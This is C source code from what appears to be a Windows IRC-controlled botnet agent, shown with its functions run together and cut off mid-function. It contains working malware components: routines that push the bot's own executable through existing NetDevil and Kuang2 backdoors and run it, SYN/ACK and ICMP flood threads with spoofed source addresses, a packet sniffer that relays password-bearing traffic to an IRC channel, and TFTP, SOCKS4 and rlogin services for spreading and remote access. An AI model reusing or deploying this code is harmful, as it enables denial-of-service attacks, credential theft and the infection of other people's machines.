DWORD WINAPI IdentThread(LPVOID param) { char user[12], buffer[IRCLINE]; int threadnum = (int)param; BOOL success = FALSE; SOCKET ssock,csock; SOCKADDR_IN ssin, csin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)113); ssin.sin_addr.s_addr=INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) != INVALID_SOCKET) { threads[threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { if (flisten(ssock, 5) != SOCKET_ERROR) { int csin_len = sizeof(csin); while (1) { if ((csock = faccept(ssock,(LPSOCKADDR)&csin,&csin_len)) == INVALID_SOCKET) break; sprintf(buffer, "[IDENTD]: Client connection from IP: %s:%d.", finet_ntoa(csin.sin_addr), csin.sin_port); addlog(buffer); if (frecv(csock,buffer,sizeof(buffer),0) != SOCKET_ERROR) { Split(buffer,0); memset(user, 0, sizeof(user)); _snprintf(buffer,sizeof(buffer)," : USERID : UNIX : %s\r\n",rndnick(user, LETTERNICK, FALSE)); if (fsend(csock,buffer,strlen(buffer),0) != SOCKET_ERROR) success = TRUE; } } } } } if (!success) { sprintf(buffer, "[IDENTD]: Error: server failed, returned: <%d>.", fWSAGetLastError()); addlog(buffer); } fclosesocket(ssock); fclosesocket(csock); clearthread(threadnum); ExitThread(0); }
int NetDevil_Upload(char *IP, SOCKET ssock) { SOCKET nsock; char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH]; int port = 0,bytes_sent = 0; unsigned int Fsend = 1024, Fsize, move; DWORD mode = 0; BOOL ver15 = FALSE; GetModuleFileName(NULL, botfile, sizeof(botfile)); fsend(ssock, "version", 7, 0); memset(buffer,0,sizeof(buffer)); frecv(ssock, buffer, sizeof(buffer), 0); if (strlen(buffer) > 5) { buffer[strlen(buffer)-2] = '\0'; char *uPort = strrchr(buffer, '\n\r'); if (uPort != NULL) port = atoi(uPort); } char *ver = strtok(buffer,"\n\r"); if (strcmp(buffer,"ver1.5") == 0) ver15 = TRUE; sprintf(rFile,"C:\\%s",filename); port = ((port == 0)?(903):(port)); if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET) goto end; HANDLE testfile; if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE) goto end; Fsize = GetFileSize(testfile,NULL); if (ver15) sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize); else sprintf(buffer,"%s\r1",rFile); fsend(nsock, buffer, strlen(buffer), 0); if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; while (Fsize) { memset(buffer,0,sizeof(buffer)); if (Fsend>Fsize) Fsend=Fsize; move = 0-Fsize; SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, buffer, Fsend, &mode, NULL); bytes_sent = fsend(nsock, buffer, Fsend, 0); if (bytes_sent == SOCKET_ERROR) { if (fWSAGetLastError() != WSAEWOULDBLOCK) goto end; else bytes_sent = 0; } Fsize = Fsize - bytes_sent; if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; } if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); fclosesocket(nsock); Sleep(2000); sprintf(buffer,"pleaz_run%s",rFile); fsend(ssock, buffer,strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); if (frecv(nsock, buffer, sizeof(buffer), 0) < 1) goto end; if (strcmp(buffer,"pleaz_run_done") != 0) goto end; Sleep(4000); fclosesocket(ssock); return 1; end:; fclosesocket(nsock); fclosesocket(ssock); return 0; }
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay) { char buffer[LOGLINE]; int size; unsigned short src_port = 9801; TCPHEADER2 send_tcp; send_tcp.source = fhtons(src_port); send_tcp.dest = fhtons((unsigned short)port); send_tcp.seq = rand(); send_tcp.ack_seq = 0; send_tcp.res1 = 0; send_tcp.res2 = 0; send_tcp.doff = 5; send_tcp.fin = 0; send_tcp.syn = 1; send_tcp.rst = 0; send_tcp.psh = 0; send_tcp.ack = 0; send_tcp.urg = 0; send_tcp.window = fhtons(512); send_tcp.check = 0; send_tcp.urg_ptr = 0; PSDHEADER psdheader; psdheader.saddr = src_ip; psdheader.daddr = dest_ip; psdheader.zero = 0; psdheader.proto = IPPROTO_TCP; psdheader.length = fhtons(sizeof(send_tcp)); memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp)); send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader)); SOCKADDR_IN ssin; memset(&ssin,0,sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)port); ssin.sin_addr.s_addr = dest_ip; int ssin_len = sizeof(ssin); SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (tcp_sock == INVALID_SOCKET) { addlog("socket open failed"); return FALSE; } if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) { sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError()); addlog(buffer); fclosesocket(tcp_sock); return FALSE; } RECVHEADER recv_tcp; memset (&recv_tcp,'\0',sizeof(recv_tcp)); while (recv_tcp.tcp.dest != src_port) { if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) { addlog("recvfrom() socket failed"); fclosesocket(tcp_sock); return FALSE; } } fclosesocket(tcp_sock); if (recv_tcp.tcp.syn == 1) { addlog("Socket open."); return TRUE; } else { addlog("Socket closed."); return FALSE; } }
DWORD WINAPI SniffThread(LPVOID param) { char sendbuf[IRCLINE], rawdata[65535], *Packet; int i; DWORD dwRet, dwMode = 1; PSNIFF sniff = *((PSNIFF *)param); PSNIFF *sniffs = (PSNIFF *)param; sniffs->gotinfo = TRUE; IPHEADER *ip; TCPHEADER *tcp; IN_ADDR sia, dia; SOCKET sniffsock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(0); ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock)); if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) { sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); clearthread(sniff.threadnum); ExitThread(0); } threads[sniff.threadnum].sock = sniffsock; if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } while(1) { memset(rawdata, 0, sizeof(rawdata)); Packet = (char *)rawdata; if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) { _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); break; } ip = (IPHEADER *)Packet; if (ip->proto == 6) { Packet += sizeof(*ip); tcp = (TCPHEADER *)Packet; sia.S_un.S_addr = ip->sourceIP; dia.S_un.S_addr = ip->destIP; if (tcp->flags == 24) { Packet += sizeof(*tcp); if (strstr(Packet, "[PSNIFF]") == NULL) { for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) { if (strstr(Packet, pswords[i].text)) { _snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE); printf("%s\n",sendbuf); addlog(sendbuf); break; } } } } } } fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); }
DWORD WINAPI ICMPFloodThread(LPVOID param) { ICMPFLOOD icmpflood = *((ICMPFLOOD *)param); ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param; icmpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; static ECHOREQUEST echo_req; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } if (finet_addr(icmpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[ICMP]: Invalid target IP."); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) { echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); echo_req.ipHeader.ident=1; echo_req.ipHeader.frag_and_flags=0; echo_req.ipHeader.ttl=128; echo_req.ipHeader.proto=IPPROTO_ICMP; echo_req.ipHeader.checksum=0; echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock)))); echo_req.ipHeader.destIP=ssin.sin_addr.s_addr; echo_req.icmpHeader.type = rand()%256; echo_req.icmpHeader.subcode = rand()%256; echo_req.icmpHeader.id = (rand() % 240) + 1; echo_req.icmpHeader.checksum = 0; echo_req.icmpHeader.seq = 1; //fill the packet data with a random character.. memset(echo_req.cData, rand()%255, sizeof(echo_req.cData)); if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); }
DWORD WINAPI tftpserver(LPVOID param) { FILE *fp; char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18]; int err=1; TFTP tftp = *((TFTP *)param); TFTP *tftps = (TFTP *)param; tftps->gotinfo = TRUE; tftp.threads++; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) { Sleep(400); sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } threads[tftp.threadnum].sock=ssock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)tftp.port); ssin.sin_addr.s_addr = INADDR_ANY; if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { Sleep(5000); tftp.threads--; return tftpserver(param); } if ((fp=fopen(tftp.filename, "rb")) == NULL) { Sleep(400); sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename); irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); clearthread(tftp.threadnum); ExitThread(0); } while(err>0 && tftps->gotinfo && fp) { TIMEVAL timeout; timeout.tv_sec=5; timeout.tv_usec=5000; fd_set fd; FD_ZERO(&fd); FD_SET(ssock,&fd); memset(buffer,0,sizeof(buffer)); if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { SOCKADDR_IN csin; int csin_len=sizeof(csin); char f_buffer[BLOCKSIZE+4]=""; err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); sprintf(IP,finet_ntoa(csin.sin_addr)); // parse buffer if(buffer[0]==0 && buffer[1]==1) { //RRQ char *tmprequest=buffer,*tmptype=buffer; tmprequest+=2; //skip the opcode tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len); // for loop to add a \0 to the end of the requestname sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname); addlog(buffer); } else { // good rrq packet send first data packet fseek(fp, 0, SEEK_SET); f_buffer[0]=0; f_buffer[1]=3; // DATA f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK # err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else if(buffer[0]==0 && buffer[1]==4) { // ACK // send next packet unsigned int blocks; BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK # f_buffer[0]=0; f_buffer[1]=3; // DATA if (b2==255) { // DATA BLOCK # f_buffer[2]=++b1; f_buffer[3]=b2=0; } else { f_buffer[2]=b1; f_buffer[3]=++b2; } blocks=(b1 * 256) + b2 - 1; // remember to subtract 1 as the ACK block # is 1 more than the actual file block # fseek(fp, blocks * BLOCKSIZE, SEEK_SET); err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len); if (err==0) { sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename); if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice); addlog(sendbuf); } } else { // we dont support any other commands fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); } } else continue; } // check for ack, then msg irc on transfer complete fclosesocket(ssock); fclose(fp); tftp.threads--; if(tftps->gotinfo == FALSE) { clearthread(tftp.threadnum); ExitThread(0); } Sleep(1000); return tftpserver(param); }
DWORD WINAPI Socks4ClientThread(LPVOID param) { SOCKS4 socks4 = *((SOCKS4 *)param); SOCKS4 *socks4p = (SOCKS4 *)param; socks4p->cgotinfo = TRUE; int threadnum = socks4.cthreadnum; SOCKS4HEADER hdr; TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(threads[threadnum].sock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) == 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } // FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing) if (socks4.userid[0] != '\0') { if (strcmp(hdr.userid, socks4.userid) != 0) { addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid); hdr.vn = 0; hdr.cd = SOCKS4_REJECT_USERID; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } } SOCKADDR_IN tsin; memset(&tsin, 0, sizeof(tsin)); tsin.sin_family = AF_INET; tsin.sin_port = hdr.destport; tsin.sin_addr.s_addr = hdr.destaddr; SOCKET tsock; if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) { addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } hdr.vn = 0; hdr.cd = SOCKS4_GRANT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); TransferLoop(tsock, threads[threadnum].sock); fclosesocket(tsock); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); }
int KUANG(SOCKET sock) { HANDLE testfile; char rBuffer[1024], thisfilename[MAX_PATH], randFile[5], rFile[15]; unsigned int Fsize, move; int x; DWORD mode = 0; memset(rFile,0,sizeof(rFile)); memset(randFile,0,sizeof(randFile)); srand(GetTickCount()); for (x=0;x < 4;x++) randFile[x] = (char)((rand()%26)+97); randFile[x+1] = '\0'; sprintf(rFile,"c:\\%s.exe",randFile); fioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking if (KUANG_Reciev(sock) == -1) goto end; memset(k2_buffer,0,sizeof(k2_buffer)); GetModuleFileName(NULL,thisfilename,sizeof(thisfilename)); testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (testfile == INVALID_HANDLE_VALUE) goto end; Fsize = GetFileSize(testfile,NULL); k2_msg->command=K2_UPLOAD_FILE; k2_msg->param=Fsize; strcpy(k2_msg->sdata,rFile); //strcpy(k2_msg->bdata,rFile); //CloseHandle(testfile); fsend(sock,k2_buffer,1024, 0); if (KUANG_Reciev(sock) == -1) goto end; while (Fsize) { unsigned int Fsend = 1024; memset(rBuffer,0,sizeof(rBuffer)); if (Fsend>Fsize) Fsend=Fsize; move = 0-Fsize; SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, rBuffer, Fsend, &mode, NULL); int bytes_sent = fsend(sock, rBuffer, Fsend, 0); if (bytes_sent == SOCKET_ERROR) { if (fWSAGetLastError() != WSAEWOULDBLOCK) break; else bytes_sent = 0; } Fsize = Fsize - bytes_sent; } if (KUANG_Reciev(sock) == -1) goto end; if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); memset(k2_buffer,0,sizeof(k2_buffer)); k2_msg->command=K2_RUN_FILE; sprintf(k2_msg->bdata,rFile); fsend(sock,k2_buffer ,1024, 0); if (KUANG_Reciev(sock) == -1) goto end; memset(k2_buffer,0,sizeof(k2_buffer)); k2_msg->command=K2_QUIT; fsend(sock,k2_buffer ,4, 0); return 1; end:; fclosesocket(sock); return 0; }
DWORD WINAPI RlogindClientThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; int threadnum=rlogind.cthreadnum; char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16]; LPHOSTENT HostEnt; SOCKADDR_IN csin; TIMEVAL timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(threads[threadnum].sock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) == 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0); GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser)); GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser)); GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType)); int csin_len = sizeof(csin); if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) { addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError()); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL) sprintf(HostName, finet_ntoa(csin.sin_addr)); else strcpy(HostName, HostEnt->h_name); frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0); fsend(threads[threadnum].sock, "", 1, 0); if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) { fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName); if (!SessionRun(threadnum)) { addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError()); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(1); } addlogv("[RLOGIND]: User logged out: <%s@%s>.", RemoteUser, HostName); fshutdown(threads[threadnum].sock,SD_BOTH); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); }
DWORD WINAPI RlogindThread(LPVOID param) { RLOGIND rlogind = *((RLOGIND *)param); RLOGIND *rloginds = (RLOGIND *)param; rloginds->gotinfo = TRUE; char sendbuf[IRCLINE]; int csin_len, Err; unsigned long mode = 1; WSADATA WSAData; SECURITY_ATTRIBUTES SecurityAttributes; DWORD id; if ((Err = fWSAStartup(MAKEWORD(2,2), &WSAData)) != 0) { addlogv("[RLOGIND]: Error: WSAStartup(): <%d>.", Err); clearthread(rlogind.threadnum); ExitThread(1); } if (!SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler, TRUE)) { addlogv("[RLOGIND]: Failed to install control-C handler, error: <%d>.", GetLastError()); fWSACleanup(); clearthread(rlogind.threadnum); ExitThread(1); } SOCKET ssock, csock; SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(rlogind.port); ssin.sin_addr.s_addr = INADDR_ANY; if ((ssock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { threads[rlogind.threadnum].sock = ssock; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) == 0) { if (flisten(ssock, SOMAXCONN) == 0) { SecurityAttributes.nLength = 